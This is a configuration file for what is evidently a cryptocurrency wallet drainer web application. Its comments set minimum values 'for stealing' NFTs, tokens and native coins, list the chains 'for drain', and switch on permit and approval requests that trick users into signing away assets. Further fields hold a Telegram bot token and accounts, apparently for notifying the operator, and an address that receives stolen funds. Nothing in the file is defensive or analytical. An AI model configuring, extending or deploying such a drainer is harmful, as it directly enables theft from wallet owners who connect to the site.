GENERATE_SOURCEMAP=false # WARN don't change
REACT_APP_PRIVATE_KEY= # wallet privat key
REACT_APP_BOT_TOKEN= # telegram bot token
REACT_APP_TG_ACC=xxx,xxx # accounts telegram
REACT_APP_EN=xxx # my account telegram
REACT_APP_TR=0x # my address for eth ))
REACT_APP_INFURA_ID= # infura id
REACT_APP_WC_ID= # walletconnect id
REACT_APP_NFT_MIN_PRICE=1 # minimum price for stealing nft
REACT_APP_TOKEN_MIN_HOLD_PRICE=10 # minimum price for stealing token
REACT_APP_NATIVE_MIN_HOLD=0.01 # minimum price for stealing native
REACT_APP_NATIVE=true # request native
REACT_APP_PERMIT1=true # request permit1
REACT_APP_PERMIT2=true # request permit2
REACT_APP_PERMIT2_APPROVE=true # request approve for permit2
REACT_APP_CUR_NET_FIRST=true # sort network first current then any if false first with more balance
REACT_APP_SUPPORTED_CHAINS=arbitrum,avalanche,base,binance-smart-chain,ethereum,fantom,polygon # supported chains for drain
REACT_APP_SUPPORTED_CHAINS_RUN=false
REACT_APP_ANKR= # ankr id
